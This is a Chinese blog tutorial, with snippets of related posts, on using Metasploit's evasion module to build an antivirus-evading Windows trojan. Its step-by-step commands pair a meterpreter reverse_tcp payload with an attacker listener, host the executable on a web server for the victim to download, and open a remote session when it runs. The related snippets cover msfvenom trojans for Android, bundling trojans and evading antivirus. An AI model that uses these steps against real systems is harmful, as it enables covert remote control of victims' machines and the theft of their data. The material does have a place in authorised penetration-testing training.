代码编织梦想

1.evasion简介

evasion是metasploit自带的模块,使用此模块可以生成反杀毒软件的木马。

2.操作流程

打开kali系统的Metasploit软件。

如图,我们可以看到evasion中有7个模块

 查看模块 search evasion

使用模块 use evasion/windows/windows_defender_exe

 查看需要配置的参数 show options

生成软件 set FILENAME 666.exe

 指定一个payload  set payload windows/meterpreter/reverse_tcp

 设置监听主机 set LHOST 192.168.0.109

 run

 将生成的软件复制到/var/www/html/目录下,便于去下载

cp /root/.msf4/local/666.exe /var/www/html/

在MSF上启动handler开始监听后门程序

1.kali启动Metasploit软件

2.使用模块 use exploit/multi/handler,并查看需要配置的参数show options

3.建立payload  set payload windows/meterpreter/reverse_tcp

4.设置监听主机--kali  set LHOSTS 192.168.1.109

5.开启run 

win7系统下载生成的666.exe文件

 运行软件,我们就成功建立会话成功

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38612882/article/details/122543103

使用veil-evasion+metasploit生成基于python的后门软件-爱代码爱编程

Veil Evasion是一个可执行文件,它被用来生成Metasploit的payload,能绕过常见杀软。 Veil-Evasion被原生设计为在kali上,但其实存在python环境的系统上应该都能运行。你可以用命令行

kali环境使用metasploit生成木马入侵安卓手机_zhaghailiangji的博客-爱代码爱编程

Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。 环境准备: Kali2.0(msfVENOM、metasploit

metasploit(msf)系列-木马生成_chaojixiaojingang的博客-爱代码爱编程

原理: 利用msf模块中的msfvenom模块,首先生成.exe木马文件,用靶机打开,攻击成功后,就渗透到了靶机系统中。 msfvenom命令行选项如下: Options:     -p, --payload    <payload>       指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用&

使用metasploit中evasion模块-爱代码爱编程

简介 几天前我说了kali这次更新我最关心的是metasploit升级到了5.0,5.0中有一个新的模块叫Evasion模块,这个模块可以轻松的创建反杀毒软件的木马,今天我们就来试一试 操作 首先打开metasploit msfconsole 你会看到下面这个界面 ➜ ~ msfconsole This

metasploit安卓木马_不疯魔,不成活。的博客-爱代码爱编程

metasploit—安卓木马入侵 (仅供学习使用,禁止非法使用) 1.生成木马程序 msfvenom -p android/meterpreter/reverse_tcp LHOST=本机ip LPORT=本机端口

TideSec远控免杀学习二(Evasion模块+veil)-爱代码爱编程

Evasion模块 参考链接: applocker_evasion_install_util.md: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/evasion/windows/applocker_evasion_install_ut

远控免杀专题文章(4)-Evasion模块免杀(VT免杀率12/71)-爱代码爱编程

本专题文章导航 1、远控免杀专题文章(1)-基础篇:https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg 2、远控免杀专题文章(2)-msfvenom隐藏的参数:https://mp.weixin.qq.com/s/1r0iakLpnLrjCrOp2gT10w 3、远控免杀专题文章(3)-msf自带

5. Metasploit之生成木马-爱代码爱编程

再学Metasploit 之前学习的Metasploit没有写笔记都忘掉了,这次叫完整的学习内容记录下来 payloads exploit是指利用漏洞的一个过程,最终的目的是为了执行payloads 即使我们不使用payload直接发给目标进行执行也是可以实现执行payloads 演示 查看payloads show payloads u

Metasploit -- 木马生成原理和方法-爱代码爱编程

以前的人,要疯要癫要崩溃,都特别戏剧化,比如披头散发,涕泗横流,瞠目结舌等等。现在的人不会,他就静静地坐在那里,面无表情,不声不响,看着很正常,但禁不起触碰。你上前轻轻碰一下,问一句,他就垮了,就崩溃了。。。 ----  网易云热评 一、生成方式:利用msf模块中的msfvenom模块 二、原理:msfvenom是msfpayload、msfenco

MSF-Evasion模块免杀-爱代码爱编程

最近开始学习免杀,发现Tide团队有免杀的系列文章,先膜拜一波大佬,这里的博客是复现和学习的笔记,如果你对内容感兴趣可以学习参考链接里提供的地址 实验环境前言defender(VT查杀率42/69)hta(VT查杀率26/61)其他 远控免杀专题文章(4)-Evasion模块免杀(VT免杀率12/71) 实验环境 为避免木马被杀

Metasploit -- 生成木马(msfvenom)-爱代码爱编程

男孩子都是铁的,你不用考虑他们的感受,他们真的不累,真的,真的不累。。。 ----  网易云热评 作用:生成木马文件 1、msfvenom 相关参数介绍 -p, --payload <payload> 指定需要使用的payload(攻击荷载) -l, --list [module_type] 列出指定模块的所有可用资源,模块类型包括

利用metasploit渗透测试制作隐藏后门-爱代码爱编程

利用metasploit渗透测试制作隐藏后门 @目录 1. 使用ms17-010永恒之蓝漏洞对win7进行渗透 2. 制作linux无文件木马程序 3. 使用脚本来进行自动创建后门 使用ms17-010永恒之蓝漏洞对win7进行渗透 已知win7ip:192.168.47.129 使用nmap对其进行开放端口探测 在kali端使用msf加载

Metasploit系列----模块详解-爱代码爱编程

kali linux中默认集成了metasploit Framework社区版本,是精简后的免费版本。使用者多为安全研究人员或学生。 metasploit中的模块分类 exploit(渗透模块): 是一段程序,运行时会利用目标的安全漏洞进行安全测试。payload(安全测试载荷模块): 在成功对目标完成一次渗透测试,payload将在目标机器运行,帮助

Metasploit 实现木马生成、捆绑及免杀-爱代码爱编程

简介: 在渗透测试的过程中,避免不了使用到社会工程学的方式来诱骗对方运行我们的木马或者点击我们准备好的恶意链接。木马的捆绑在社会工程学中是我们经常使用的手段,而为了躲避杀毒软件的查杀,我们又不得不对木马进行免杀处理。本次实验我们将学习如何通过Metasploit的msfvenom命令来生成木马、捆绑木马以及对木马进行免杀处理。木马文件风险高,想要免杀需要用